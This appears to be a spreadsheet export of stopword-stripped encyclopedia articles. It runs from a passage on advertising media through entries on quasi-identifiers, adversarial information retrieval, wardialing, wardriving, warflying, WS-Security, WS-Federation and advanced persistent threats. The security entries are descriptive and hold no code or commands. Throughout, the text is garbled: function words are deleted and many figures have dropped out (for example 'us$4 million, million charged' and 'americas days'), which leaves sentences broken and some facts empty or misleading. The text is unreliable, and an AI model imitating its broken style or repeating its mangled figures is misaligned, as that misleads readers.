paintings, billboards, street furniture components, printed flyers rack cards, radio, cinema television adverts, banners, mobile telephone screens, shopping carts, popups, skywriting, stop benches, human billboards forehead advertising, magazines, newspapers, town criers, sides buses, banners attached sides airplanes ("logojets"), in-flight advertisements seatback tray tables overhead storage bins, taxicab doors, roof mounts passenger screens, musical stage shows, subway platforms trains, elastic bands disposable diapers, doors bathroom stalls, stickers apples supermarkets, shopping cart handles (grabertising), opening section streaming audio video, posters, backs event tickets supermarket receipts. situation "identified" sponsor pays deliver message medium advertising. television television advertising expensive types advertising; networks charge large amounts commercial airtime popular events. annual super bowl football game united states known prominent advertising event television audience million studies showing tuned advertisements. during 2014 edition game, average thirty-second cost us$4 million, million charged 60-second spot. virtual advertisements inserted regular programming computer graphics. typically inserted otherwise blank backdrops used replace local billboards relevant remote broadcast audience. virtual billboards inserted background none exist real-life. this technique especially used televised sporting events. virtual product placement also possible. infomercial long-format television commercial, typically five minutes longer. name blends words "information" "commercial". main objective infomercial create impulse purchase, target sees presentation immediately buys product advertised toll-free telephone number website. infomercials describe often demonstrate products, commonly testimonials customers industry professionals. radio radio advertisements broadcast radio waves transmitter antenna thus receiving device. airtime purchased station network exchange airing commercials. while radio limitation restricted sound, proponents radio advertising often cite advantage. radio expanding medium found air, also online. according arbitron, radio approximately 241.6 million weekly listeners, percent u.s. population.online online advertising form promotion uses internet world wide expressed purpose delivering marketing messages attract customers. online delivered server. examples online advertising include contextual appear search engine results pages, banner ads, click text ads, rich media ads, social network advertising, online classified advertising, advertising networks e-mail marketing, including e-mail spam. newer form online advertising native ads; website's news feed supposed improve user experience less intrusive. however, people argue practice deceptive.domain names domain name advertising commonly done click search engines, however, advertisers often lease space directly domain names generically describe products. when internet user visits website typing domain name directly browser, known "direct navigation", "type traffic. although many internet users search ideas products using search engines mobile phones, large number users around world still address bar. they type keyword address "geraniums" ".com" sometimes ".org" country-code level domain (tld ".co.uk" united kingdom ".ca" canada). when internet users type generic keyword .com another top-level domain (tld) ending, produces targeted sales lead. domain name advertising originally developed oingo (later known applied semantics), google's early acquisitions.product placements covert advertising product brand embedded entertainment media. example, film, main character item definite brand, movie minority report, cruise's character john anderton owns phone nokia logo clearly written corner, watch engraved bulgari logo. another example advertising film robot, main character played will smith mentions converse shoes several times, calling "classics", film future. robot spaceballs also showcase futuristic cars audi mercedes-benz logos clearly displayed front vehicles. cadillac chose advertise movie matrix reloaded, result contained many scenes cadillac cars used. similarly, product placement omega watches, ford, vaio, aston martin cars featured recent james bond films, notably casino royale. "fantastic four: rise silver surfer", main transport vehicle shows large dodge logo front. blade runner includes obvious product placement; whole film stops show coca-cola billboard.print print advertising describes advertising printed medium newspaper, magazine, trade journal. this encompasses everything media broad readership base, major national newspaper magazine, narrowly targeted media local newspapers trade journals specialized topics. form print advertising classified advertising, allows private individuals companies purchase small, narrowly targeted paid word line. another form print advertising display generally larger design elements typically article section newspaper.: outdoor billboards, also known hoardings parts world, large structures located public places display advertisements passing pedestrians motorists. most often, located main roads large amount passing motor pedestrian traffic; however, placed location large numbers viewers, mass transit vehicles stations, shopping malls office buildings, stadiums. form known street advertising first came prominence street advertising services create outdoor advertising street furniture pavements. working products reverse graffiti, dancers pavement advertising, getting brand messages public spaces. sheltered outdoor advertising combines outdoor indoor advertisement placing large mobile, structures (tents) public places temporary bases. large outer advertising space aims exert strong pull observer, product promoted indoors, creative decor intensify impression. mobile billboards generally vehicle mounted billboards digital screens. these dedicated vehicles built solely carrying advertisements along routes preselected clients, also specially equipped cargo trucks cases, large banners strewn planes. billboards often lighted; backlit, others employing spotlights. some billboard displays static, others change; example, continuously periodically rotating among advertisements. mobile displays used various situations metropolitan areas throughout world, including: target advertising, one-day long-term campaigns, conventions, sporting events, store openings similar promotional events, advertisements smaller companies. point-of-sale in-store advertising advertisement placed retail store. includes placement product visible locations store, level, ends aisles near checkout counters (a.k.a. point purchase display), eye-catching displays promoting specific product, advertisements places shopping carts in-store video displays.novelties advertising printed small tangible items coffee mugs, t-shirts, pens, bags, known novelty advertising. some printers specialize printing novelty items, distributed directly advertiser, items distributed part cross-promotion, fast food containers.celebrity endorsements advertising celebrity endorses product brand leverages celebrity power, fame, money, popularity gain recognition products promote specific stores' products. advertisers often advertise products, example, celebrities share favorite products wear clothes specific brands designers. celebrities often involved advertising campaigns television print adverts advertise specific general products. celebrities endorse brand downsides, however; mistake celebrity detrimental public relations brand. example, following performance eight gold medals 2008 olympic games beijing, china, swimmer michael phelps' contract kellogg's terminated, kellogg's want associate photographed smoking marijuana. celebrities britney spears advertised multiple products including pepsi, candies kohl's, twister, nascar, toyota.aerial using aircraft, balloons airships create display advertising media. skywriting notable example. media approaches advertising approach known advanced advertising, data-driven advertising, using large quantities data, precise measuring tools precise targeting. advanced advertising also makes easier companies sell ad-space attribute customer purchases display broadcast.increasingly, media overtaking many "traditional" media television, radio newspaper shift toward usage internet news music well devices like digital video recorders (dvrs) tivo.online advertising began unsolicited bulk e-mail advertising known "e-mail spam". spam problem e-mail users since 1978. online communication channels became available, advertising followed. first banner appeared world wide 1994. prices web-based advertising space dependent "relevance" surrounding content traffic website receives.in online display advertising, display generate awareness quickly. unlike search, requires someone aware need, display advertising drive awareness something without previous knowledge. display works well direct response. display used generating awareness, used direct response campaigns link landing page clear 'call action'.as mobile phone became mass medium 1998 first paid downloadable content appeared mobile phones finland, mobile advertising followed, also first launched finland 2000. 2007 value mobile advertising reached billion providers admob delivered billions mobile ads.more advanced mobile include banner ads, coupons, multimedia messaging service picture video messages, advergames various engagement marketing campaigns. particular feature driving mobile barcode, replaces need typing addresses, uses camera feature modern phones gain immediate access content. percent japanese mobile phone users already active users barcodes.some companies proposed placing messages corporate logos side booster rockets international space station.unpaid advertising (also called "publicity advertising"), include personal recommendations ("bring friend", "sell it"), spreading buzz, achieving feat equating brand common noun united states, "xerox" "photocopier", "kleenex" tissue, "vaseline" petroleum jelly, "hoover" vacuum cleaner, "band-aid" adhesive bandage). however, companies oppose brand name label object. equating brand common noun also risks turning brand generic trademark turning generic term means legal protection trademark lost.early life, aired short programming breaks called "content wraps", advertise company's product entire commercial break. pioneered "content wraps" products featured herbal essences, crest, guitar hero covergirl, toyota.a promotion concept appeared, "arvertising", advertising augmented reality technology.controversy exists effectiveness subliminal advertising (see mind control), pervasiveness mass messages (propaganda). rise media with internet came many advertising opportunities. pop-up, flash, banner, pop-under, advergaming, email advertisements (all often unwanted spam case email) commonplace. particularly since rise "entertaining" advertising, people like advertisement enough wish watch later show friend. general, advertising community made easy, although used internet widely distribute anyone willing hear them. last three quarters 2009, mobile internet advertising grew respectively, older media advertising declines: −10.1% (tv), −11.7% (radio), −14.8% (magazines) −18.7% (newspapers). between 2008 2014, u.s. newspapers lost half print advertising revenue. niche marketing another significant trend regarding future advertising growing importance niche market using niche targeted ads. also brought internet theory long tail, advertisers increasing ability reach specific audiences. past, efficient deliver message blanket largest mass market audience possible. however, usage tracking, customer profiles growing popularity niche content brought everything blogs social networking sites, provide advertisers audiences smaller much better defined, leading relevant viewers effective companies' marketing products. among others, comcast spotlight advertiser employing method video demand menus. these advertisements targeted specific group viewed anyone wishing find particular business practice, home. this causes viewer become proactive actually choose advertisements want view. niche marketing could also helped bringing issue colour advertisements. different colours play major roles comes marketing strategies, example, seeing blue promote sense calmness gives sense security many social networks facebook blue logos. google adsense example niche marketing. google calculates primary purpose website adjusts accordingly; uses keywords page even emails) find general ideas topics disused places likely clicked viewers email account website visitors. crowdsourcing concept crowdsourcing given trend user-generated advertisements. user-generated created people, opposed advertising agency company themselves, often resulting brand sponsored advertising competitions. 2007 super bowl, frito-lays division pepsico held "crash super bowl" contest, allowing people create doritos commercials. chevrolet held similar competition tahoe line suvs. success doritos user-generated 2007 super bowl, frito-lays relaunched competition 2009 2010 super bowl. resulting among most-watched most-liked super bowl ads. fact, winning aired 2009 super bowl ranked today super bowl meter year winning aired 2010 super bowl found nielsen's buzzmetrics "most buzzed-about". another example companies using crowdsourcing successfully beverage company jones soda encourages consumers participate label design themselves.this trend given rise several online platforms host user-generated advertising competitions behalf company. founded 2007, zooppa launched competitions brands google, nike, hershey's, general mills, microsoft, universal, zinio, mini cooper. crowdsourcing remains controversial, long-term impact advertising industry still unclear. globalization advertising gone five major stages development: domestic, export, international, multi-national, global. global advertisers, four, potentially competing, business objectives must balanced developing worldwide advertising: building brand speaking voice, developing economies scale creative process, maximising local effectiveness ads, increasing company's speed implementation. born evolutionary stages global marketing three primary fundamentally different approaches development global advertising executions: exporting executions, producing local executions, importing ideas travel.advertising research determining success country region. ability identify elements and/or moments contribute success economies scale maximized. once knows works idea ideas imported market. market research measures, flow attention, flow emotion branding moments provide insight working country region measures based visual, verbal, elements foreign public messaging foreign governments, particularly marketable commercial products services, often promote interests positions advertising goods target audience largely unaware forum vehicle foreign messaging also willing receive message mental state absorbing information advertisements television commercial breaks, reading periodical, passing billboards public spaces. prime example messaging technique advertising campaigns promote international travel. while advertising foreign destinations services stem typical goal increasing revenue drawing tourism, travel campaigns carry additional alternative intended purpose promoting good sentiments improving existing ones among target audience towards given nation region. common advertising promoting foreign countries produced distributed tourism ministries countries, often carry political statements and/or depictions foreign government's desired international public perception. additionally, wide range foreign airlines travel-related services advertise separately destinations, themselves, owned respective governments; examples include, though limited emirates airline (dubai), singapore airlines (singapore), qatar airways (qatar), china airlines (taiwan/republic china), china (people's republic china). depicting destinations, airlines, services favorable pleasant light, countries market populations abroad manner could mitigate prior public impressions. diversification realm advertising agencies, continued industry diversification seen observers note "big global clients need global agencies more". this reflected growth non-traditional agencies various global markets, canadian business taxi smart australia referred revolution world". technology ability record shows digital video recorders (such tivo) allow watchers record programs later viewing, enabling fast forward commercials. additionally, seasons pre-recorded sets offered sale television programs; fewer people watch shows however, fact sets sold, means company receive additional profits sets. counter effect, variety strategies employed. many advertisers opted product placement shows like survivor. other strategies include integrating advertising internet-connected program guidess (epgs), advertising companion devices (like smartphones tablets) show, creating mobile apps programs. additionally, like brands opted social television sponsorship.the emerging technology drone displays recently used advertising purposes. education recent years several media literacy initiatives, specifically concerning advertising, seek empower citizens face media advertising campaigns.advertising education become popular bachelor, master doctorate degrees becoming available emphasis. surge advertising interest typically attributed strong relationship advertising plays cultural technological changes, advance online social networking. unique model teaching advertising student-run advertising agency, advertising students create campaigns real companies. organizations american advertising federation establish companies students create campaigns. purposes advertising front delivering proper message customers prospective customers. purpose advertising inform consumers product convince customers company's services products best, enhance image company, point create need products services, demonstrate uses established products, announce products programs, reinforce salespeople's individual messages, draw customers business, hold existing customers. sales promotions brand loyalty sales promotions another advertise. sales promotions double purposed used gather information type customers draws are, jump start sales. sales promotions include things like contests games, sweepstakes, product giveaways, samples coupons, loyalty programs, discounts. ultimate goal sales promotions stimulate potential customers action. criticisms while advertising seen necessary economic growth, without social costs. unsolicited commercial e-mail forms spam become prevalent become major nuisance user</t>
  </si>
  <si>
    <t>Quasi-identifier</t>
  </si>
  <si>
    <t>quasi-identifiers pieces information unique identifiers, sufficiently well correlated entity combined quasi-identifiers create unique identifier.quasi-identifiers thus, combined, become personally identifying information. this process called re-identification. example, latanya sweeney shown even though neither gender, birth dates postal codes uniquely identify individual, combination three sufficient identify individuals united states.the term introduced tore dalenius 1986. since then, quasi-identifiers basis several attacks released data. instance, sweeney linked health records publicly available information locate then-governor massachusetts' hospital records using uniquely identifying quasi-identifiers, sweeney, winn used public voter records re-identify participants personal genome project. additionally, arvind narayanan vitaly shmatikov discussed quasi-identifiers indicate statistical conditions de-anonymizing data released netflix.motwani ying warn potential privacy breaches enabled publication large volumes government business data containing quasi-identifiers. also de-identification differential privacy personally identifying information references</t>
  </si>
  <si>
    <t>Adversarial information retrieval</t>
  </si>
  <si>
    <t>adversarial information retrieval (adversarial topic information retrieval related strategies working data source portion manipulated maliciously. tasks include gathering, indexing, filtering, retrieving ranking information data source. adversarial includes study methods detect, isolate, defeat manipulation. web, predominant form manipulation search engine spamming (also known spamdexing), involves employing various techniques disrupt activity search engines, usually financial gain. examples spamdexing link-bombing, comment referrer spam, spam blogs (splogs), malicious tagging. reverse engineering ranking algorithms, advertisement blocking, click fraud, content filtering also considered forms adversarial data manipulation. topics topics related spam (spamdexing): link spam keyword spamming cloaking malicious tagging spam related blogs, including comment spam, splogs, ping spamother topics: click fraud detection reverse engineering search engine's ranking algorithm content filtering advertisement blocking stealth crawling troll (internet) malicious tagging voting social networks astroturfing sockpuppetry history term "adversarial information retrieval" first coined 2000 andrei broder (then chief scientist alta vista) plenary session trec-9 conference. also information retrieval spamdexing references external links airweb: series workshops adversarial information retrieval spam challenge: competition researchers spam detection spam datasets: datasets research spam detection</t>
  </si>
  <si>
    <t>WarVOX</t>
  </si>
  <si>
    <t>warvox free, open-source voip-based dialing tool exploring, classifying, auditing phone systems. warvox processed audio call using signal processing techniques without need modems. warvox used voip providers internet instead modems used dialers. compared pauses words identify numbers using particular voicemail systems.warvox merged metasploit project august 2011.the warvox project longer maintained. also moore metasploit rapid7 toneloc, dialer dos. dialing w3af references external links warvox official website metasploit project metasploit project website, hosts warvox code</t>
  </si>
  <si>
    <t>Warchalking</t>
  </si>
  <si>
    <t>warchalking drawing symbols public places advertise open wi-fi network. inspired hobo symbols, warchalking marks conceived group friends june 2002 publicised matt jones designed icons produced downloadable document containing them. within days jones publishing blog entry warchalking, articles appeared dozens publications stories appeared several major television news programs around world.the word formed analogy wardriving, practice driving around area detect open wi-fi nodes. that term turn based wardialing, practice dialing many phone numbers hoping find modem. having found wi-fi node, warchalker draws special symbol nearby object, wall, pavement, lamp post. those offering wi-fi service might also draw symbol advertise availability wi-fi location, whether commercial personal. also hotspot (wi-fi) mesh networking ssid wifi analyzer netstumbler wardriving hobo code references external links langley, nick june 2003). "the demise warchalkers". computerweekly. retrieved 2017.</t>
  </si>
  <si>
    <t>Wardialing</t>
  </si>
  <si>
    <t>wardialing dialing) technique automatically scan list telephone numbers, usually dialing every number local area code search modems, computers, bulletin board systems (computer servers) machines. hackers resulting lists various purposes: hobbyists exploration, crackers—malicious hackers specialize breaching computer security—for guessing user accounts capturing voicemail greetings), locating modems might provide entry-point computer electronic systems. also used security personnel, example, detect unauthorized devices, modems faxes, company's telephone network. process single wardialing call would involve calling unknown number, waiting rings, since answering computers usually pick first ring. phone rings twice, modem hangs tries next number. modem machine answers, wardialer program makes note number. human answering machine answers, wardialer program hangs depending time day, wardialing 10,000 numbers given area code might annoy dozens hundreds people, attempt fail answer phone rings, succeed, hear wardialing modem's carrier tone hang repeated incoming calls especially annoying businesses many consecutively numbered lines exchange, used centrex telephone system. some newer wardialing software, warvox, require modem conduct wardialing. rather, programs voip connections, speed number calls wardialer make. sandstorm enterprises patent u.s. patent 6,490,349 multi-line dialer. ("system method scan-dialing telephone numbers classifying equipment connected telephone lines associated therewith.") patented technology implemented sandstorm's phonesweep dialer. etymology popular name technique originated 1983 film wargames. film, protagonist programmed computer dial every telephone number sunnyvale, california find computer systems. prior movie's release, technique known "hammer dialing" "demon dialing", film introduced method many, members 414s. 1985 least company advertised "war games autodialer" commodore computers. such programs became common bulletin board systems time, file names often truncated wardial.exe like length restrictions characters systems. eventually, etymology name fell behind "war dialing" gained currency within computing culture.the popularity wardialing 1980s 1990s prompted states enact legislation prohibiting device dial telephone numbers without intent communicating person. variants recent phenomenon wardriving, searching wireless networks (wi-fi) moving vehicle. wardriving named wardialing, since techniques involve actively scanning find computer networks. wardriving collect information wireless access points (not confused piggybacking). similar dialing port scan tcp/ip, "dials" every port every address find services available. unlike wardialing, however, port scan generally disturb human tries address, regardless whether computer responding address not. related wardriving warchalking, practice drawing chalk symbols public places advertise availability wireless networks. term also used today analogy various sorts exhaustive brute force attack authentication mechanism, password. while dictionary attack might involve trying word dictionary password, "wardialing password" would involve trying every possible password. password protection systems usually designed make impractical, making process slow and/or locking account minutes hours number wrong password entries. also autodialer toneloc, dialer dos. warflying vishing references external links c.f.r. 64.1200(a)(7) electronic code federal regulations date version tcpa appears make wardialing federal crime united states. school hacks: dialing warvox 2009 article using warvox internal network scan.</t>
  </si>
  <si>
    <t>Wardriving</t>
  </si>
  <si>
    <t>wardriving searching wi-fi wireless networks, usually moving vehicle, using laptop smartphone. software wardriving freely available internet. warbiking, warcycling, warwalking similar approach modes transportation. etymology driving originated wardialing, method popularized character played matthew broderick film wargames, named film. dialing consists dialing every phone number specific sequence search modems. variants warbiking warcycling similar wardriving, done moving bicycle motorcycle. this practice sometimes facilitated mounting wi-fi enabled device vehicle. warwalking, warjogging, similar wardriving, done foot rather moving vehicle. disadvantages method slower speed travel (but leading discovery infrequently discovered networks) absence convenient computing environment. consequently, handheld devices pocket computers, perform tasks users walking standing, dominated practice. technology advances developments early 2000s expanded extent practice. advances include computers integrated wi-fi, rather compactflash (cf) card (pcmcia) add-in cards computers dell axim, compaq ipaq toshiba pocket computers starting 2002. later, active nintendo sony enthusiast communities gained wi-fi abilities devices. further, nearly modern smartphones integrate wi-fi global positioning system (gps). warrailing, wartraining, similar wardriving, done train tram rather slower controllable vehicle. disadvantages method higher speed travel (resulting less discovery infrequently discovered networks) often limited major roads higher traffic. warkitting combination wardriving rootkitting. warkitting attack, hacker replaces firmware attacked router. this allows control traffic victim, could even permit disable replacing html content downloaded. warkitting identified tsow, jakobsson, yang, wetzel. mapping wardrivers wi-fi-equipped device together device record location wireless networks. results uploaded websites like wigle, openbmap geomena data processed form maps network neighborhood. there also clients available smartphones running android upload data directly. better range sensitivity, antennas built bought, vary omnidirectional highly directional. maps known network used geolocation system—an alternative gps—by triangulating current position signal strengths known network ids. examples include place intel, skyhook, navizon cyril houri, seekerlocate seeker wireless, openbmap geomena. navizon openbmap combines information wi-fi cell phone tower maps contributed users wi-fi-equipped cell phones. addition location finding, provides navigation information, allows tracking position friends, geotagging. december 2004, class undergraduates worked city seattle, washington several weeks. they found 5,225 access points; secured encryption, open, pay-for-access. they noticed trends frequency security networks depending location. many open networks clearly intended used general public, network names like "open share, porn please" "free access, nice." information collected high-resolution maps, published online. previous efforts mapped cities dublin. legal ethical considerations some portray wardriving questionable practice (typically association piggybacking), though, technical viewpoint, everything working designed: many access points broadcast identifying data accessible anyone suitable receiver. could compared making neighborhood's house numbers mail labels.while claim wardriving illegal, laws specifically prohibit allow wardriving, though many localities laws forbidding unauthorized access computer networks protecting personal privacy. google created privacy storm countries eventually admitted systematically surreptitiously gathering wi-fi data capturing video footage mapping data street view service. since using android-based mobile devices gather data.passive, listen-only wardriving (with programs like kismet kismac) communicate networks, merely logging broadcast addresses. this likened listening radio station happens broadcasting area forms dxing. with types software, netstumbler, wardriver actively sends probe messages, access point responds design. legality active wardriving less certain, since wardriver temporarily becomes "associated" network, even though data transferred. most access points, using default "out box" security settings, intended provide wireless access request driver's liability reduced setting computer static instead using dhcp, preventing network granting computer address logging connection.in united states, case usually referenced determining whether network "accessed" state allen. case, allen wardialing attempt free long-distance calling southwestern bell's computer systems. when presented password protection screen, however, attempt bypass court ruled although "contacted" "approached" computer system, constitute "access" company's network. software istumbler inssider kismet kismac netspot netstumbler wifi-where wigle androidthere also homebrew wardriving applications handheld game consoles support wi-fi, sniff jazzbox/wardive nintendo ds/android, road sony psp, wifi-where iphone, g-mon, wardrive, wigle wifi android, wlanpollution symbian nokias60 devices. there also exists mode within metal gear solid: portable sony (wherein player able find comrades searching wireless access points) used wardrive. treasure world commercial game gameplay wholly revolves around wardriving. also honeypot (computing) hotspot warchalking warshipping references external links dictionary definition wardriving wiktionary</t>
  </si>
  <si>
    <t>Ware report</t>
  </si>
  <si>
    <t>security controls computer systems, commonly called ware report, 1970 text willis ware foundational field computer security. development defense contractor louis, missouri, bought mainframe computer, using classified work fighter aircraft. provide additional income, contractor asked department defense (dod) permission sell computer time mainframe local businesses remote terminals, classified work continued.at time, policy cover this. dod's advanced research projects agency (arpa) asked ware rand employee chair committee examine report feasibility security controls computer systems.the committee's report classified document given january 1970 defense science board (dsb), taken project arpa. after declassification, report published rand october 1979. influence ieee computer society said report widely circulated, ieee annals history computing said together ware's 1967 spring joint computer conference session, marked start field computer security.the report influenced security certification standards processes, especially banking defense industries, report instrumental creating orange book. external links official website references</t>
  </si>
  <si>
    <t>Warflying</t>
  </si>
  <si>
    <t>warflying warstorming activity consisting using airplane wi-fi-equipped computer, laptop pda, detect wi-fi wireless networks. warstorming shares similarities wardriving warwalking aspects except method transport. originated western australia wafreenet (wafn) group taking grumman tiger four-seater near perth city 2002, documented weblog jason jordan nature flying, much difficult attempt access open networks warflying. also warxing external links g4tv warflying wifi smh.com.au news site driving takes perth boingboing wifi planes warflying http://rabbit-hole.org/ advanced project free wi-fi free airport wi-fi passwords</t>
  </si>
  <si>
    <t>Advertising ID</t>
  </si>
  <si>
    <t>advertising unique user assigned mobile device (smart phone, tablet computer), operating environment, help advertising services personalizing offers. sent advertisers third parties unique track user's movements, habits, usages applications. there potential technology replace magic cookies. implementations apple calls advertising "identifier advertisers" (idfa). beginning 14.5 software update, apple allow users choose whether allow apps track idfa. google calls "google advertising (aaid). microsoft uses similar technology, also called advertising generated device user. windows turned settings panel. also ad-id technical standard used centrally manage advertising assets supply chain references</t>
  </si>
  <si>
    <t>Wargame (hacking)</t>
  </si>
  <si>
    <t>hacking, wargame game) cyber-security challenge mind sport competitors must exploit defend vulnerability system application, gain prevent access computer system.a wargame usually involves capture flag logic, based pentesting, semantic attacks, knowledge-based authentication, password cracking, reverse engineering software (often javascript, assembly language), code injection, injections, cross-site scripting, exploits, address spoofing, forensics, hacking techniques. wargames preparedness wargames also used method cyberwarfare preparedness. nato cooperative cyber defence centre excellence (ccdcoe) organizes annual event, locking shields, international live-fire cyber exercise. exercise challenges cyber security experts real-time attacks fictional scenarios used develop skills national defense strategies. additional applications wargames used teach basics attacks security, giving participants better understanding attackers exploit security vulnerabilities. wargames also used "stress test" organization's response plan serve drill identify gaps cyber disaster preparedness. also hackathon computer programming marathon largest hacker convention software freedom linux open source event campus party massive party cyberwarfare preparedness references external links wechall list wargame websites security.stackexchange.com hacking competitions ctftime worldwide tracking site</t>
  </si>
  <si>
    <t>WS-Security based products and services</t>
  </si>
  <si>
    <t>ws-security flexible feature-rich extension soap apply security services. member ws-* family service specifications published oasis. closely related ws-security ws-trust, also ws-* specification oasis standard provides extensions ws-security. following ws-security based products services: also ws-* service specifications identity management identity management systems list single sign-on implementations oasis (organization) saml saml-based products services security token service (sts) single sign-on ws-federation ws-trust services references</t>
  </si>
  <si>
    <t>After School (app)</t>
  </si>
  <si>
    <t>after school proprietary android, social network mobile application allows users defined network, aimed high schools, share anonymous text-based posts images others. july 2016, after school users 20,000 american high schools.according michael callahan, created network “that teens could express themselves, reach others offer help fellow teens distress.”the app, created michael callahan cory levy one, inc., debuted mid-november 2014. re-release april 2015, after school implemented “mature content” filters, verification, 24/7 live anonymous support, first (fastest internet response system threats). february 2016, after school announced raising $16.4 million series round. also detects threatening harmful messages using "language algorithms" "enforces single-report immediate user removal violations."while service formally discontinued, website offline applications longer available download google play store apple store 2020. criticism service received criticism enabling cyberbullying anonymous nature intended audience, well accessible parents teachers. references</t>
  </si>
  <si>
    <t>WS-Federation</t>
  </si>
  <si>
    <t>ws-federation (web services federation) identity federation specification, developed group companies: systems, software, inc. (along layer technologies part inc.), ibm, microsoft, novell, hewlett packard enterprise, verisign. part larger services security framework, ws-federation defines mechanisms allowing different security realms broker information identities, identity attributes authentication. associated specifications following draft specifications associated ws-security: ws-secureconversation ws-federation ws-authorization ws-policy ws-trust ws-privacy also list service specifications services saml xacml liberty alliance openid external links ws-federation specification whitepaper: understanding ws-federation whitepaper: federation identities services world</t>
  </si>
  <si>
    <t>Advanced persistent threat</t>
  </si>
  <si>
    <t>advanced persistent threat (apt) stealthy threat actor, typically nation state state-sponsored group, gains unauthorized access computer network remains undetected extended period. recent times, term also refer non-state-sponsored groups conducting large-scale targeted intrusions specific goals.such threat actors' motivations typically political economic. every major business sector recorded instances cyberattacks advanced actors specific goals, whether steal, spy, disrupt. these targeted sectors include government, defense, financial services, legal services, industrial, telecoms, consumer goods many more. some groups utilize traditional espionage vectors, including social engineering, human intelligence infiltration gain access physical location enable network attacks. purpose attacks install custom malware (malicious software).the median "dwell-time", time attack goes undetected, differs widely regions. fireeye reported mean dwell-time 2018 americas days, emea days, apac days. such long dwell-time allows attackers significant amount time attack cycle, propagate, achieve objective. definition definitions precisely vary, summarized named requirements below: advanced operators behind threat full spectrum intelligence-gathering techniques disposal. these include commercial open source computer intrusion technologies techniques, also extend include intelligence apparatus state. while individual components attack considered particularly "advanced" (e.g. malware components generated commonly available do-it-yourself malware construction kits, easily procured exploit materials), operators typically access develop advanced tools required. they often combine multiple targeting methods, tools, techniques order reach compromise target maintain access operators also demonstrate deliberate focus operational security differentiates "less advanced" threats. persistent operators specific objectives, rather opportunistically seeking information financial gain. this distinction implies attackers guided external entities. targeting conducted continuous monitoring interaction order achieve defined objectives. mean barrage constant attacks malware updates. fact, "low-and-slow" approach usually successful. operator loses access target usually reattempt access, often, successfully. operator's goals maintain long-term access target, contrast threats need access execute specific task. threat apts threat capability intent. attacks executed coordinated human actions, rather mindless automated pieces code. operators specific objective skilled, motivated, organized well funded. actors limited state sponsored groups. history targets warnings targeted, socially-engineered emails dropping trojans exfiltrate sensitive information published cert organisations 2005. this method used throughout early 1990s constitute apt. term "advanced persistent threat" cited originating united states force 2006 colonel greg rattray cited individual coined term.the stuxnet computer worm, targeted computer hardware iran's nuclear program, example attack. case, iranian government might consider stuxnet creators advanced persistent threat.within computer security community, increasingly within media, term almost always used reference long-term pattern sophisticated computer network exploitation aimed governments, companies, political activists, extension, also ascribe attributes groups behind attacks. advanced persistent threat (apt) term shifting focus computer-based hacking rising number occurrences. world reported percent increase 2010 2011 particularly advanced targeted computer attacks.actors many countries used cyberspace means gather intelligence individuals groups individuals interest. united states cyber command tasked coordinating military's offensive defensive cyber operations.numerous sources alleged groups affiliated with, agents governments sovereign states. businesses holding large quantity personally identifiable information high risk targeted advanced persistent threats, including: higher education financial institutions energy transportation technology health care telecommunications manufacturing agriculturea bell canada study provided deep research anatomy apts uncovered widespread presence canadian government critical infrastructure. attribution established chinese russian actors. life cycle actors behind advanced persistent threats create growing changing risk organizations' financial assets, intellectual property, reputation following continuous process kill chain: target specific organizations singular objective attempt gain foothold environment (common tactics include spear phishing emails) compromised systems access target network deploy additional tools help fulfill attack objective cover tracks maintain access future initiativesthe global landscape apt's sources sometimes referred singular "the" apt, references actor behind specific incident series incidents, definition includes actor method.in 2013, mandiant presented results research alleged chinese attacks using method 2004 2013 followed similar lifecycle: initial compromise performed social engineering spear phishing, email, using zero-day viruses. another popular infection method planting malware website victim's employees likely visit. establish foothold plant remote administration software victim's network, create backdoors tunnels allowing stealth access infrastructure. escalate privileges exploits password cracking acquire administrator privileges victim's computer possibly expand windows domain administrator accounts. internal reconnaissance collect information surrounding infrastructure, trust relationships, windows domain structure. move laterally expand control workstations, servers infrastructure elements perform data harvesting them. maintain presence ensure continued control access channels credentials acquired previous steps. complete mission exfiltrate stolen data victim's network.in incidents analysed mandiant, average period attackers controlled victim's network year, longest almost five years. infiltrations allegedly performed shanghai-based unit 61398 people's liberation army. chinese officials denied involvement attacks.previous reports secdev previously discovered implicated chinese actors. mitigation strategies there tens millions malware variations, makes extremely challenging protect organizations apt. while activities stealthy hard detect, command control network traffic associated detected network layer level sophisticated methods. deep analyses correlation various sources limited usefulness detecting activities. challenging separate noises legitimate traffic. traditional security technology methods ineffective detecting mitigating apts. active cyber defense yielded greater efficacy detecting prosecuting apts (find, fix, finish) applying cyber threat intelligence hunt adversary pursuit activities. human-introduced cyber vulnerabilities (hicv) weak cyber link neither well understood mitigated, constituting significant attack vector. groups china since jinping became general secretary chinese communist party 2012, ministry state security gained responsibility cyberespionage vis-à-vis people's liberation army, currently oversees various groups. according security researcher timo steffens "the landscape china 'whole country' approach, leveraging skills universities, individual, private public sectors." unit 61398 (also known apt1) unit 61486 (also known apt2) buckeye (also known apt3) apollo (also known apt10) numbered panda (also known apt12) deputydog (also known apt17) codoso team (also known apt19) wocao (also known apt20) unit 78020 (also known apt30 naikon) zirconium (also known apt31) periscope group (also known apt40) double dragon (also known apt41, winnti group, barium, axiom) tropic trooper hafnium lightbasin(also known unc1945) iran elfin team (also known apt33) helix kitten (also known apt34) charming kitten (also known apt35) apt39 pioneer kitten israel unit 8200 north korea kimsuky lazarus group (also known apt38) ricochet chollima (also known apt37) russia fancy bear (also known apt28) cozy bear (also known apt29) sandworm berserk bear fin7 gamaredon (also known primitive bear) active since 2013, unlike apts, gamaredon broadly targets users globe addition also focusing certain victims, especially ukrainian organizations) appears provide services apts. example, invisimole threat group attacked select systems gamaredon earlier compromised fingerprinted. venomous bear turkey strongpity (also known apt-c-41 promethium) united states equation group uzbekistan sandcat, associated state security service according kaspersky vietnam oceanlotus (also known apt32) also references further reading gartner best practices mitigating advanced persistent threats bell canada, combating robot networks their controllers: pstp08-0107esec 2010 (pstp) prepare 'post-crypto world', warns godfather encryption defence research: dark space project apt0 archived 2020-07-26 wayback machine gartner: strategies dealing with advanced targeted attacks cyber: remote file infection attack example secdev, “ghostnet” large-scale cyber spying operation discovered march 2009 secdev, “shadows cloud”. complex ecosystem cyber espionage systematically targeted compromised computer systems india, offices dalai lama, united nations, several countries.list advanced persistent threat groupsfireeye: advanced persistent threat groups mitre att&amp;ck security community tracked advanced persistent group pages</t>
  </si>
  <si>
    <t>Blacker (security)</t>
  </si>
  <si>
